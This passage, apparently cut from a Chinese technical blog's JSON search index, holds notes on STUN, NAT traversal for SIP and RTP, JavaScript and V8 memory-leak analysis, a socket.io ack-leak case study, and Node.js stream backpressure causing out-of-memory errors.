下图是一个webrtc呼叫的抓包,可以看到,在呼叫建立前的阶段。服务端和客户端都相互发送了Binding Request和响应了Binding Response。\n并且在通话过程中,还会有持续的binding request, 并且在某些时候,源端口可能会变。说明媒体发送的端口也已经发生了改变。\n如果binding request 请求没有响应,那么语音很可能也会断,从而导致了呼叫挂断。\n参考 https://www.3cx.com/blog/voip-howto/stun/ https://www.3cx.com/blog/voip-howto/stun-voip-1/ https://www.3cx.com/blog/voip-howto/stun-protocol/ https://www.3cx.com/blog/voip-howto/stun-details/ ","permalink":"https://wdd.js.org/opensips/ch1/stun-notes/","summary":"title: \u0026ldquo;STUN协议笔记\u0026rdquo; date: \u0026ldquo;2022-01-06 17:54:10\u0026rdquo; draft: false STUN是Simple Traversal of User Datagram Protocol (UDP) through Network Address Translators (NAT’s)的缩写 传输层底层用的是UDP 主要用来NAT穿透 主要用来解决voip领域的单方向通话(one-way)的问题 目的是让NAT后面的设备能发现自己的公网IP以及NAT的类型 让外部设备能够找到合适的端口和内部设备通信 刷新NAT绑定,类似keep-alive机制。否则端口映射可能因为超时被释放 STUN是cs架构的协议 客户端端192.168.1.3,使用5060端口,发送stun请求到 64.25.58.65, 经过了192.168.1.1的网关之后 网关将源ip改为212.128.56.125, 端口改为15050 stun服务器将请求发送到 网关的外网端口15050,然后网关将请求转发给192.168.1.3:5060 stun message type which typically is one of the below: - 0x0001 : Binding Request - 0x0101 : Binding Response\n0x0111 : Binding Error Response 0x0002 : Shared Secret Request 0x0102 : Shared Secret Response 0x0112 : Shared Secret Error Response **0x0001: MAPPED-ADDRESS - **This attribute contains an IP address and port.","title":"STUN协议笔记"},{"content":"什么是NAT? 
NAT(网络地址转换), 具体可以参考百科 https://baike.baidu.com/item/nat/320024。\nNAT是用来解决IPv4的地址不够的问题。\n例如上图,内网的主机,在访问外网时,源192.168的地址,会被改写成1.2.3.4。所以在server端看来,请求是从1.2.3.4发送过来的。\nNAT一般会改写请求的源IP包的源IP地址,也可能会改写tcp或者udp的源端口地址。\nNAT地址范围 互联网地址分配机构保留了三类地址只能用于私有地址,这些地址只能用于NAT内部,不能用于公网。\n如果在sip消息中,Contact头中的地址是192.168开头,聪明的服务器应该知道,这个请求来自NAT内部。\n10.0.0.0 - 10.255.255.255 (10/8 prefix) 172.16.0.0 - 172.31.255.255 (172.16/12 prefix) 192.168.0.0 - 192.168.255.255 (192.168/16 prefix) NAT 工作原理 NAT内部流量流出时,源IP和源端口都被改写,目标地址和端口不会改写。源ip和端口与被改写后的ip和端口存在一段时间的映射关系,当响应回来时,根据这个映射关系,NAT设备知道这个包应该发给内网的哪个设备。\nNAT分类 静态NAT: 每个内部主机都永久映射一个外部公网IP 动态NAT: 每个内部主机都动态映射一个外部公网IP 网络地址端口转换: 内部主机映射到外部不同端口上 由于静态NAT和动态NAT并不能节省公网IP, 常用的都是网络地址端口转换,即NAPT。\nNAPT 网络地址端口转换分类 全锥型NAT 限制锥型NAT: 限制主机 端口限制NAT:限制主机和端口 Full Cone NAT 全锥型NAT 打洞过程\n来自nat内部ip1:port1地址在经过路由器时,路由器会打洞ip1\u0026rsquo;:port1' 任何服务器只要把包发到ip1\u0026rsquo;:port1\u0026rsquo;,路由器都会把这个包发到ip1:port1。也就是说,即使刚开始打洞的包是发给server1的,如果server2知道这个洞的信息,那么server2也可以通过这洞,将消息发给ip1:port1 Restricted Cone NAT 限制锥型NAT 限制锥型打洞过程和全锥型差不多,只不过增加了限制。\n如果内部主机是把包发到server1的,即使server2知道打洞的信息,它发的包也不会被转给内部主机。 Port Restricted Cone NAT 端口限制NAT 端口限制NAT要比上述两种NAT的限制更为严格\n内部主机如果将消息发到server1的5080端口,那么这个端口只允许server1的5080端口发消息回来 server1的其他端口发消息到这个洞都会被拒绝 SIP信令NAT穿越 NAT内部消息发到fs时,会携带如下信息。假如fs对NAT一无所知,如果后续有呼叫,fs是无法将消息发到192.168.0.102的,因为192.168.0.102是内网地址。\n但是fs足够聪明,它会分析包的源ip和源端口,从而正确的将sip消息送到NAT设备上。\nVia: SIP/2.0/UDP 192.168.1.160:11266;branch=z9hG4bK-d8754z-1f2cd509;rport Contact: \u0026lt;sip:flavio@192.168.1.160:11266\u0026gt; c=IN IP4 192.168.1.160 m=audio 8616 RTP/AVP 0 8 3 101 sip消息头Via, Contact以及sdp中的c=和m=, 可能会带有内网的ip和端口,如果不加以翻译处理,sip服务器是无法将消息发到这些内网地址上的。\nfs会将原始Contact头增加一些信息\nContact 1001@192.168.0.102:5060;fs_nat=yes;fs_path:sip:1001@1.2.3.4:23424 RTP流NAT穿越 c=IN IP4 192.168.40.79 m=audio 31114 RTP/AVP 0 8 9 101 一般invite消息或者200ok的sdp下都会携带连接信息, c=, 但是这个连接信息因为是内网地址,所以fs并不会使用这个作为rtp的对端地址。\nfs会等待NAT内部设备发来的第一个RTP包,fs会分析RTP包,提取出NAT设备上的RTP洞的信息,然后将另一方的语音流送到NAT设备上的洞里。\n再由NAT设备将RTP流送到对应的内部主机。\nNAT与SIP的问题 
NAT设备,例如路由器,一般工作在网络层和传输层。NAT会修改网络层的IP地址和传输层的端口,但是NAT不会修改包的内容。sip消息都是封装到包内容中的。\n看一个INVITE消息,出现的内容都是内网中的,当sip服务器收到这个消息,那么它是无法向内网发送响应体的。\nVia 头中的10.1.1.221:5060 c=IN IP4 10.1.1.221 m=audio 49170 RTP/AVP 0 当然,有问题就有解决方案\nreceived 标记来源ip rport 标记来源端口 使用这两个字段,就可以将数据正确的发送到NAT设备上\nINVITE sip:UserB@there.com SIP/2.0 Via: SIP/2.0/UDP 10.1.1.221:5060;branch=z9hG4bKhjh From: TheBigGuy \u0026lt;sip:UserA@customer.com\u0026gt;;tag=343kdw2 To: TheLittleGuy \u0026lt;sip:UserB@there.com\u0026gt; Max-Forwards: 70 Call-ID: 123456349fijoewr CSeq: 1 INVITE Subject: Wow! It Works... Contact: \u0026lt;sip:UserA@10.1.1.221\u0026gt; Content-Type: application/sdp Content-Length: ... v=0 o=UserA 2890844526 2890844526 IN IP4 UserA.customer.coms=- t=0 0 c=IN IP4 10.1.1.221 m=audio 49170 RTP/AVP 0 a=rtpmap:0 PCMU/8000 参考 https://tools.ietf.org/html/rfc1918 ","permalink":"https://wdd.js.org/opensips/ch1/nat-sip-rtp/","summary":"什么是NAT? NAT(网络地址转换), 具体可以参考百科 https://baike.baidu.com/item/nat/320024。\nNAT是用来解决IPv4的地址不够的问题。\n例如上图,内网的主机,在访问外网时,源192.168的地址,会被改写成1.2.3.4。所以在server端看来,请求是从1.2.3.4发送过来的。\nNAT一般会改写请求的源IP包的源IP地址,也可能会改写tcp或者udp的源端口地址。\nNAT地址范围 互联网地址分配机构保留了三类地址只能用于私有地址,这些地址只能用于NAT内部,不能用于公网。\n如果在sip消息中,Contact头中的地址是192.168开头,聪明的服务器应该知道,这个请求来自NAT内部。\n10.0.0.0 - 10.255.255.255 (10/8 prefix) 172.16.0.0 - 172.31.255.255 (172.16/12 prefix) 192.168.0.0 - 192.168.255.255 (192.168/16 prefix) NAT 工作原理 NAT内部流量流出时,源IP和源端口都被改写,目标地址和端口不会改写。源ip和端口与被改写后的ip和端口存在一段时间的映射关系,当响应回来时,根据这个映射关系,NAT设备知道这个包应该发给内网的哪个设备。\nNAT分类 静态NAT: 每个内部主机都永久映射一个外部公网IP 动态NAT: 每个内部主机都动态映射一个外部公网IP 网络地址端口转换: 内部主机映射到外部不同端口上 由于静态NAT和动态NAT并不能节省公网IP, 常用的都是网络地址端口转换,即NAPT。\nNAPT 网络地址端口转换分类 全锥型NAT 限制锥型NAT: 限制主机 端口限制NAT:限制主机和端口 Full Cone NAT 全锥型NAT 打洞过程\n来自nat内部ip1:port1地址在经过路由器时,路由器会打洞ip1\u0026rsquo;:port1' 任何服务器只要把包发到ip1\u0026rsquo;:port1\u0026rsquo;,路由器都会把这个包发到ip1:port1。也就是说,即使刚开始打洞的包是发给server1的,如果server2知道这个洞的信息,那么server2也可以通过这洞,将消息发给ip1:port1 Restricted Cone NAT 限制锥型NAT 
限制锥型打洞过程和全锥型差不多,只不过增加了限制。\n如果内部主机是把包发到server1的,即使server2知道打洞的信息,它发的包也不会被转给内部主机。 Port Restricted Cone NAT 端口限制NAT 端口限制NAT要比上述两种NAT的限制更为严格\n内部主机如果将消息发到server1的5080端口,那么这个端口只允许server1的5080端口发消息回来 server1的其他端口发消息到这个洞都会被拒绝 SIP信令NAT穿越 NAT内部消息发到fs时,会携带如下信息。假如fs对NAT一无所知,如果后续有呼叫,fs是无法将消息发到192.168.0.102的,因为192.168.0.102是内网地址。\n但是fs足够聪明,它会分析包的源ip和源端口,从而正确的将sip消息送到NAT设备上。\nVia: SIP/2.0/UDP 192.168.1.160:11266;branch=z9hG4bK-d8754z-1f2cd509;rport Contact: \u0026lt;sip:flavio@192.","title":"SIP信令和媒体都绕不开的NAT问题"},{"content":"参考: http://slides.com/gruizdevilla/memory\n内存是一张图 原始类型,只能作为叶子。原始类型不能引用其他类型 数字 字符串 布尔值 除了原始类型之外,其他类型都是对象,其实就是键值对 数组是一种特殊对象,它的键是连续的数字 内存从根开始 在浏览器中,根对象是window 在nodejs中,根对象是global 任何从根无法到达的对象,都会被GC回收,例如下图的节点9和10 根节点的GC是无法控制的 路径 从根节点开始到特定对象的路径,如下图的1-2-4-6-8 支配项 每个对象有且仅有一个支配项,支配项对对象可能不是直接引用 举例子 节点1支配节点2 节点2支配节点3、4、6 节点3支配节点5 节点6支配节点7 节点5支配节点8 上面的例子有个不好理解的是节点2为什么支配了节点6?如果节点A存在于从根节点到节点B的每一个路径中,那么A就是B的支配项。2存在于1-2-4-6,也存在于1-2-3-6,所以节点2支配节点6 V8 新生代与老生代 v8内存分为新生代和老生代内存,两块内存使用不同的内存GC策略 相比而言,新生代GC很快,老生代则较慢 新生代的内存在某些条件下会被转到老生代内存区 GC发生时,应用可能会暂停 解除引用的一些错误 var a = {name: \u0026#39;wdd\u0026#39;} delete a.name // 这会让对象a变成慢对象 var a = {name: \u0026#39;wdd\u0026#39;} a.name = null // 这个则更好 关于slow Object V8 optimizing compiler makes assumptions on your code to make optimizations. It transparently creates hidden classes that represent your objects. Using these hidden classes, V8 works much faster. If you \u0026ldquo;delete\u0026rdquo; properties, these assumptions are no longer valid, and the code is de-optimized, slowing your code. 
// Fast Object function FastPurchase(units, price) { this.units = units; this.price = price; this.total = 0; this.x = 1; } var fast = new FastPurchase(3, 25); // Slow Object function SlowPurchase(units, price) { this.units = units; this.price = price; this.total = 0; this.x = 1; } var slow = new SlowPurchase(3, 25); //x property is useless //so I delete it delete slow.x; Timers内存泄露 // var buggyObject = { callAgain: function () { var ref = this; var val = setTimeout(function () { console.log(\u0026#39;Called again: \u0026#39; + new Date().toTimeString()); ref.callAgain(); }, 1000); } }; buggyObject.callAgain(); buggyObject = null; 闭包内存泄露 var a = function () { var largeStr = new Array(1000000).join(\u0026#39;x\u0026#39;); return function () { return largeStr; }; }(); var a = function () { var smallStr = \u0026#39;x\u0026#39;, largeStr = new Array(1000000).join(\u0026#39;x\u0026#39;); return function (n) { return smallStr; }; }(); var a = function () { var smallStr = \u0026#39;x\u0026#39;, largeStr = new Array(1000000).join(\u0026#39;x\u0026#39;); return function (n) { eval(\u0026#39;\u0026#39;); //maintains reference to largeStr return smallStr; }; }(); DOM 内存泄露 #leaf maintains a reference to it\u0026rsquo;s parent (parentNode), and recursively up to #tree, so only when leafRef is nullified is the WHOLE tree under #tree candidate to be GC\nvar select = document.querySelector; var treeRef = select(\u0026#34;#tree\u0026#34;); var leafRef = select(\u0026#34;#leaf\u0026#34;); var body = select(\u0026#34;body\u0026#34;); body.removeChild(treeRef); //#tree can\u0026#39;t be GC yet due to treeRef treeRef = null; //#tree can\u0026#39;t be GC yet, due to //indirect reference from leafRef leafRef = null; //NOW can be #tree GC 守则 Use appropiate scope Better than de-referencing, use local scopes. Unbind event listeners Unbind events that are no longer needed, specially if the related DOM objects are going to be removed. 
Manage local cache Be careful with storing large chunks of data that you are not going to use. 分析内存泄漏的工具 浏览器: performance.memory devtool memory profile 关于闭包的提示 给闭包命名,这样在内存分析时,就可以按照函数名找到对应的函数 ","permalink":"https://wdd.js.org/fe/memory-leak-ppt/","summary":"参考: http://slides.com/gruizdevilla/memory\n内存是一张图 原始类型,只能作为叶子。原始类型不能引用其他类型 数字 字符串 布尔值 除了原始类型之外,其他类型都是对象,其实就是键值对 数组是一种特殊对象,它的键是连续的数字 内存从根开始 在浏览器中,根对象是window 在nodejs中,根对象是global 任何从根无法到达的对象,都会被GC回收,例如下图的节点9和10 根节点的GC是无法控制的 路径 从根节点开始到特定对象的路径,如下图的1-2-4-6-8 支配项 每个对象有且仅有一个支配项,支配项对对象可能不是直接引用 举例子 节点1支配节点2 节点2支配节点3、4、6 节点3支配节点5 节点6支配节点7 节点5支配节点8 上面的例子有个不好理解的是节点2为什么支配了节点6?如果节点A存在于从根节点到节点B的每一个路径中,那么A就是B的支配项。2存在于1-2-4-6,也存在于1-2-3-6,所以节点2支配节点6 V8 新生代与老生代 v8内存分为新生代和老生代内存,两块内存使用不同的内存GC策略 相比而言,新生代GC很快,老生代则较慢 新生代的内存在某些条件下会被转到老生代内存区 GC发生时,应用可能会暂停 解除引用的一些错误 var a = {name: \u0026#39;wdd\u0026#39;} delete a.name // 这会让对象a变成慢对象 var a = {name: \u0026#39;wdd\u0026#39;} a.name = null // 这个则更好 关于slow Object V8 optimizing compiler makes assumptions on your code to make optimizations. It transparently creates hidden classes that represent your objects.","title":"JavaScript内存泄露分析"},{"content":"什么是内存泄漏? 单位时间内的内存变化量可能有三个值\n正数:内存可能存在泄漏。生产环境,如果服务在启动后,该值一直是正值,从未出现负值或者趋近于0的值,那么极大的可能是存在内存泄漏的。 趋近于0的值: 内存稳定维持 负数:内存在释放 实际上,在观察内存变化量时,需要有两个前提条件\n一定的负载压力:因为在开发或者功能测试环境,很少的用户,服务的压力很小,是很难观测到内存泄漏问题的。所以务必在一定的负载压力下观测。 至少要观测一天:内存上涨并不一定意味着存在内存泄漏问题。在一个工作日中,某些时间点,是用户使用的高峰期,服务的负载很高,自然内存使用会增长。关键在于在高峰期过后的低谷期时,内存是否会下降到正常值。如果内存在低谷期时依然维持着高峰期时的内存使用,那么非常大可能是存在内存泄漏了。 下图是两个服务的。从第一天的0点开始观测服务的内存,一直到第二天的12点。正常的服务会随着负载的压力增加或者减少内存使用。而存在内存泄漏的服务,内存一直在上升,并且负载压力越大,上升的越快。\n有没有可能避免内存泄漏? 除非你不写代码,否则你是无法避免内存泄漏的问题的。\n第一,即使你是非常精通某个语言,也是有很多关于如何避免内存泄漏的经验。但是你的代码里仍然可能会包含其他库或者其他同事写的代码,那些代码里是无法保证是否存在内存泄漏问题的。 第二,内存泄漏的代码有时候非常难以察觉。例如console.log打印的太快,占用太多的buffer。网络流量激增,占用太多的Recv_Q,node无法及时处理。写文件太慢,没有处理“后压”相关的逻辑等等。\n为什么要关注内存泄漏? 
为什么要关注内存泄漏?我们客户的服务器可是有500G内存的\n你可能有个很豪的金主。但是你不要忘记一个故事。\n传说国际象棋是由一位印度数学家发明的。国王十分感谢这位数学家,于是就请他自己说出想要得到什么奖赏。这位数学家想了一分钟后就提出请求——把1粒米放在棋盘的第1格里,2粒米放在第2格,4粒米放在第3格,8粒米放在第4格,依次类推,每个方格中的米粒数量都是之前方格中的米粒数量的2倍。\n国王欣然应允,诧异于数学家竟然只想要这么一点的赏赐——但随后却大吃了一惊。当他开始叫人把米放在棋盘上时,最初几个方格中的米粒少得像几乎不存在一样。但是,往第16个方格上放米粒时,就需要拿出1公斤的大米。而到了第20格时,他的那些仆人则需要推来满满一手推车的米。国王根本无法提供足够的大米放在棋盘上的第64格上去。因为此时,棋盘上米粒的数量会达到惊人的18 446 744 073 709 551 615粒。如果我们在伦敦市中心再现这一游戏,那么第64格中的米堆将延伸至M25环城公路,其高度将超过所有建筑的高度。事实上,这一堆米粒比过去1000年来全球大米的生产总量还要多得多。\n对于内存泄漏来说,可能500G都是不够用的。\n实际上操作系统对进程使用内存资源是有限制的,我们关注内存泄漏,实际上是关注内存泄漏会引起的最终问题:out of memory。如果进程使用的资源数引起了操作系统的注意,很可能进程被操作系统杀死。\n然后你的客户可能正在使用你的服务完成一个重要的事情,接着你们的客户投诉热线会被打爆,然后是你的老板,你的领导找你谈话~~~\n基本类型 vs 引用类型 基本类型:undefined, null, boolean, number, string。基本类型是按值访问 引用类型的值实际上是指向内存中的对象 上面的说法来自《JavaScript高级程序设计》。但是对于基本类型字符串的定义,实际上我是有些不认同的。有些人也认为字符串不属于基本类型。\n就是关于字符串,我曾思考过,在JavaScript里,字符串的最大长度是多少,字符串最多能装下多少个字符?\n我个人认为,一个变量有固定的大小的内存占用,才是基本类型。例如数字,null, 布尔值,这些值很容易能理解它们会占用固定的内存大小。但是字符串就不一样了。字符串的长度是不固定,在不同的浏览器中,有些字符串最大可能占用256M的内存,甚至更多。\n可以参考这个问题:https://stackoverflow.com/questions/34957890/javascript-string-size-limit-256-mb-for-me-is-it-the-same-for-all-browsers\n内存是一张图 1代表根节点,在NodeJS里是global对象,在浏览器中是window对象 2-6代表对象 7-8代表原始类型。分别有三种,字符串,数字,布尔值 9-10代表从根节点无法到达的对象 注意,作为原始类型的值,在内存图中只能是叶子节点。 ** 从根节点R0无法到达的节点9,10,将会在GC时被清除。\n保留路径的含义是从根对象到某一节点的最短路径。例如1-\u0026gt;2-\u0026gt;4-\u0026gt;6。\n对象保留树 节点: 构造函数的名称 边缘:对象的key 距离: 节点到根节点的最短距离 支配项(Dominators) 每个对象有且仅有一个支配项 如果B存在从根节点到A节点之间的所有路径中,那么B是A的支配项,即B支配A。 下图中\n1支配2 2支配3,4,6 (想想2为什么没有支配5?) 3支配5 6支配7 5支配8 理解支配项的意义在于理解如何将资源释放。如下图所示,如果目标是释放节点6的占用资源,仅仅释放节点3或者节点4是没有用的,必须释放其支配项节点2,才能将节点6释放。 对象大小 对象自身占用大小:shallow size 通过保持对其他对象的引用隐式占用,这种方式可以阻止这些对象被垃圾回收器(简称 GC)自动处置 对象的大小的单位是字节 分析工具 heapsnapshot import {writeHeapSnapshot} from \u0026#39;v8\u0026#39; router.get(\u0026#39;/heapdump\u0026#39;, function (req: express.Request, res: express.
Response, next: express.NextFunction) { logger.debug(\u0026#39;help_heapdump::\u0026#39;, req.ip, req.hostname) if (req.hostname !== \u0026#39;localhost\u0026#39;) { logger.error(\u0026#39;error:report_bad_host:\u0026#39;, req.hostname) return res.status(401).end() } res.status(200).end() let fileName = writeHeapSnapshot(\u0026#39;node.heapsnapshot\u0026#39;) logger.info(\u0026#39;help_heapdumap_file::\u0026#39;, fileName) }) 通过将v8 writeHeapSnapshot放到express的路由中,我们可以简单通过curl的方式产生snapshot文件。需要注意的是,writeHeapSnapshot可能需要一段时间来产生snapshot文件。在生产环境中,需要注意该函数的调用频率。\n拿到snapshot文件后,下一步是使用chrome dev-tools去打开这个文件。\n在chrome的inspect页面:chrome://inspect/#devices\n点击Open dedicated DevTools for Node。可以打开一个单独的dev-tools页面。当然你也可以在任意一个页面打开devTools。\n点击load, 选择snapshot文件,就可以加载了。 真实的内存泄漏实战分析: socket.io内存泄漏 我写过一个使用socket.io来完成实时消息推送的服务,在做压力测试的时候,两个实例,模拟2000个客户端WebSocket连接,然后以每秒1000个速度发送消息,在持续压测15个小时之后,Node.js的内存从50M上涨到1.5G。所以,这其中必然产生了内存泄漏。\n在array这一列,可以看出它占用的Shallow Size和Retained Size占用的内存都是超过90%的。 我们展开array这一列,可以发现有很多的distance是15的对象。然后我们展开其中一个对象后。\n可以发现从距离是14到1之间的保留路径。\n展开一个对象之后,发现有很多ackClient,这个ackClient实际上对应了代码里我写的一个函数,用来确认消息是否被客户端收到的。这个确认机制是socket.io提供的。\n当我确认内存泄漏是socket.io的确认机制的问题后,我就将确认的函数从代码中移除,改为消息不确认。在一段时间的压测过后,服务的内存趋于稳定,看来问题已经定位了。\nsocket.io内存泄漏的原因 在阅读了socket.io的源码之后,可以看到每个Socket对象都有一个acks对象用来表示确认。\nfunction Socket(nsp, client, query){ this.nsp = nsp; this.server = nsp.server; this.adapter = this.nsp.adapter; this.id = nsp.name !== \u0026#39;/\u0026#39; ? 
nsp.name + \u0026#39;#\u0026#39; + client.id : client.id; this.client = client; this.conn = client.conn; this.rooms = {}; this.acks = {}; this.connected = true; this.disconnected = false; this.handshake = this.buildHandshake(query); this.fns = []; this.flags = {}; this._rooms = []; } 在调用socket.emit()方法时,socket.io会将消息的id附着在acks对象上,可以想象,随着消息发送的量增大,这个acks的属性将会越来越多。\nif (typeof args[args.length - 1] === \u0026#39;function\u0026#39;) { if (this._rooms.length || this.flags.broadcast) { throw new Error(\u0026#39;Callbacks are not supported when broadcasting\u0026#39;); } debug(\u0026#39;emitting packet with ack id %d\u0026#39;, this.nsp.ids); this.acks[this.nsp.ids] = args.pop(); packet.id = this.nsp.ids++; } 当收到ack之后,acks上对应的包的属性才会被删掉。\nSocket.prototype.onack = function(packet){ var ack = this.acks[packet.id]; if (\u0026#39;function\u0026#39; == typeof ack) { debug(\u0026#39;calling ack %s with %j\u0026#39;, packet.id, packet.data); ack.apply(this, packet.data); delete this.acks[packet.id]; } else { debug(\u0026#39;bad ack %s\u0026#39;, packet.id); } }; 如果客户端不对消息进行ack确认,那么服务端就会积累非常多的待确认的消息,最终导致内存泄漏。\n虽然这个问题的最终原因是客户端没有及时确认,但是查看一下socket.io的项目,发现已经有将近500个issue没有解决。我觉得有时间的话,我会用原生的websocket替换掉socket.io。不然这个socket.io很可能会成为项目的一个瓶颈点。\n参考资料 http://slides.com/gruizdevilla/memory http://bmeck.github.io/snapshot-utils/doc/manual/terms.html https://nodejs.org/dist/latest-v12.x/docs/api/v8.html#v8_v8_writeheapsnapshot_filename https://github.com/socketio/socket.io/issues/3494 ","permalink":"https://wdd.js.org/fe/memory-leak-sharing/","summary":"什么是内存泄漏? 
单位时间内的内存变化量可能有三个值\n正数:内存可能存在泄漏。生产环境,如果服务在启动后,该值一直是正值,从未出现负值或者趋近于0的值,那么极大的可能是存在内存泄漏的。 趋近于0的值: 内存稳定维持 负数:内存在释放 实际上,在观察内存变化量时,需要有两个前提条件\n一定的负载压力:因为在开发或者功能测试环境,很少的用户,服务的压力很小,是很难观测到内存泄漏问题的。所以务必在一定的负载压力下观测。 至少要观测一天:内存上涨并不一定意味着存在内存泄漏问题。在一个工作日中,某些时间点,是用户使用的高峰期,服务的负载很高,自然内存使用会增长。关键在于在高峰期过后的低谷期时,内存是否会下降到正常值。如果内存在低谷期时依然维持着高峰期时的内存使用,那么非常大可能是存在内存泄漏了。 下图是两个服务的。从第一天的0点开始观测服务的内存,一直到第二天的12点。正常的服务会随着负载的压力增加或者减少内存使用。而存在内存泄漏的服务,内存一直在上升,并且负载压力越大,上升的越快。\n有没有可能避免内存泄漏? 除非你不写代码,否则你是无法避免内存泄漏的问题的。\n第一,即使你是非常精通某个语言,也是有很多关于如何避免内存泄漏的经验。但是你的代码里仍然可能会包含其他库或者其他同事写的代码,那些代码里是无法保证是否存在内存泄漏问题的。 第二,内存泄漏的代码有时候非常难以察觉。例如console.log打印的太快,占用太多的buffer。网络流量激增,占用太多的Recv_Q,node无法及时处理。写文件太慢,没有处理“后压”相关的逻辑等等。\n为什么要关注内存泄漏? 为什么要关注内存泄漏?我们客户的服务器可是有500G内存的\n你可能有个很豪的金主。但是你不要忘记一个故事。\n传说国际象棋是由一位印度数学家发明的。国王十分感谢这位数学家,于是就请他自己说出想要得到什么奖赏。这位数学家想了一分钟后就提出请求——把1粒米放在棋盘的第1格里,2粒米放在第2格,4粒米放在第3格,8粒米放在第4格,依次类推,每个方格中的米粒数量都是之前方格中的米粒数量的2倍。\n国王欣然应允,诧异于数学家竟然只想要这么一点的赏赐——但随后却大吃了一惊。当他开始叫人把米放在棋盘上时,最初几个方格中的米粒少得像几乎不存在一样。但是,往第16个方格上放米粒时,就需要拿出1公斤的大米。而到了第20格时,他的那些仆人则需要推来满满一手推车的米。国王根本无法提供足够的大米放在棋盘上的第64格上去。因为此时,棋盘上米粒的数量会达到惊人的18 446 744 073 709 551 615粒。如果我们在伦敦市中心再现这一游戏,那么第64格中的米堆将延伸至M25环城公路,其高度将超过所有建筑的高度。事实上,这一堆米粒比过去1000年来全球大米的生产总量还要多得多。\n对于内存泄漏来说,可能500G都是不够用的。\n实际上操作系统对进程使用内存资源是有限制的,我们关注内存泄漏,实际上是关注内存泄漏会引起的最终问题:out of memory。如果进程使用的资源数引起了操作系统的注意,很可能进程被操作系统杀死。\n然后你的客户可能正在使用你的服务完成一个重要的事情,接着你们的客户投诉热线会被打爆,然后是你的老板,你的领导找你谈话~~~\n基本类型 vs 引用类型 基本类型:undefined, null, boolean, number, string。基本类型是按值访问 引用类型的值实际上是指向内存中的对象 上面的说法来自《JavaScript高级程序设计》。但是对于基本类型字符串的定义,实际上我是有些不认同的。有些人也认为字符串不属于基本类型。\n就是关于字符串,我曾思考过,在JavaScript里,字符串的最大长度是多少,字符串最多能装下多少个字符?\n我个人认为,一个变量有固定的大小的内存占用,才是基本类型。例如数字,null, 布尔值,这些值很容易能理解它们会占用固定的内存大小。但是字符串就不一样了。字符串的长度是不固定,在不同的浏览器中,有些字符串最大可能占用256M的内存,甚至更多。\n可以参考这个问题:https://stackoverflow.com/questions/34957890/javascript-string-size-limit-256-mb-for-me-is-it-the-same-for-all-browsers\n内存是一张图 1代表根节点,在NodeJS里是global对象,在浏览器中是window对象 2-6代表对象 7-8代表原始类型。分别有三种,字符串,数字,布尔值 9-10代表从根节点无法到达的对象 注意,作为原始类型的值,在内存图中只能是叶子节点。 **
从根节点R0无法到达的节点9,10,将会在GC时被清除。\n保留路径的含义是从根对象到某一节点的最短路径。例如1-\u0026gt;2-\u0026gt;4-\u0026gt;6。\n对象保留树 节点: 构造函数的名称 边缘:对象的key 距离: 节点到根节点的最短距离 支配项(Dominators) 每个对象有且仅有一个支配项 如果B存在从根节点到A节点之间的所有路径中,那么B是A的支配项,即B支配A。 下图中\n1支配2 2支配3,4,6 (想想2为什么没有支配5?) 3支配5 6支配7 5支配8 理解支配项的意义在于理解如何将资源释放。如下图所示,如果目标是释放节点6的占用资源,仅仅释放节点3或者节点4是没有用的,必须释放其支配项节点2,才能将节点6释放。 对象大小 对象自身占用大小:shallow size 通过保持对其他对象的引用隐式占用,这种方式可以阻止这些对象被垃圾回收器(简称 GC)自动处置 对象的大小的单位是字节 分析工具 heapsnapshot import {writeHeapSnapshot} from \u0026#39;v8\u0026#39; router.","title":"JS内存泄漏分享"},{"content":"今天我收集了一份大概有40万行的日志,为了充分利用这份日志,我决定把日志给解析,解析完了之后,再写入mysql数据库。\n首先,对于40万行的日志,肯定不能一次性读取到内存。\n所以我用了NodeJs内置的readline模块。\nconst readline = require(\u0026#39;readline\u0026#39;) let line_no = 0 let rl = readline.createInterface({ input: fs.createReadStream(\u0026#39;./my.log\u0026#39;) }) rl.on(\u0026#39;line\u0026#39;, function(line) { line_no++; console.log(line) }) // end rl.on(\u0026#39;close\u0026#39;, function(line) {
console.log(\u0026#39;Total lines : \u0026#39; + line_no); }) 数据解析以及写入到这块我没有贴代码。代码的执行是正常的,但是一段时间之后,程序就报错Out Of Memory。\n代码执行是在nodejs 10.16.3上运行的,谷歌搜了一下解决方案,看到有人说nodejs升级到12.x版本就可以解决这个问题。我抱着试试看的想法,升级了nodejs到最新版,果然没有再出现OOM的问题。\n后来我想,我终于深刻理解了NodeJS官网上的这篇文章 Backpressuring in Streams,以前我也读过几遍,但是不太了解,这次结合实际情况,有了深刻理解。\nNodeJS在按行读取本地文件时,大概可以达到每秒1000行的速度,然而数据写入到MySql,大概每秒100次插入的样子。\n本身网络上存在的延迟就要比读取本地磁盘要慢,读到太多的数据无法处理,只能暂时积压到内存中,然而内存有限,最终OOM的异常就抛出了。\nNodeJS 12.x应该解决了这个问题。\n参考 https://nodejs.org/en/docs/guides/backpressuring-in-streams/ ","permalink":"https://wdd.js.org/fe/oom-backpressuring-in-streams/","summary":"今天我收集了一份大概有40万行的日志,为了充分利用这份日志,我决定把日志给解析,解析完了之后,再写入mysql数据库。\n首先,对于40万行的日志,肯定不能一次性读取到内存。\n所以我用了NodeJs内置的readline模块。\nconst fs = require(\u0026#39;fs\u0026#39;) const readline = require(\u0026#39;readline\u0026#39;) let line_no = 0 let rl = readline.createInterface({ input: fs.createReadStream(\u0026#39;./my.log\u0026#39;) }) rl.on(\u0026#39;line\u0026#39;, function(line) { line_no++; console.log(line) }) // end rl.on(\u0026#39;close\u0026#39;, function(line) { console.log(\u0026#39;Total lines : \u0026#39; + line_no); }) 数据解析以及写入到这块我没有贴代码。代码的执行是正常的,但是一段时间之后,程序就报错Out Of Memory。\n代码执行是在nodejs 10.16.3上运行的,谷歌搜了一下解决方案,看到有人说nodejs升级到12.x版本就可以解决这个问题。我抱着试试看的想法,升级了nodejs到最新版,果然没有再出现OOM的问题。\n后来我想,我终于深刻理解了NodeJS官网上的这篇文章 Backpressuring in Streams,以前我也读过几遍,但是不太了解,这次结合实际情况,有了深刻理解。\nNodeJS在按行读取本地文件时,大概可以达到每秒1000行的速度,然而数据写入到MySql,大概每秒100次插入的样子。\n本身网络上存在的延迟就要比读取本地磁盘要慢,读到太多的数据无法处理,只能暂时积压到内存中,然而内存有限,最终OOM的异常就抛出了。\nNodeJS 12.x应该解决了这个问题。\n参考 https://nodejs.org/en/docs/guides/backpressuring-in-streams/ ","title":"NodeJS Out of Memory: Backpressuring in Streams"},{"content":"一般情况下,建议你不要用new Date(\u0026ldquo;time string\u0026rdquo;)的方式去做时间解析。因为不同浏览器,可能接受的time 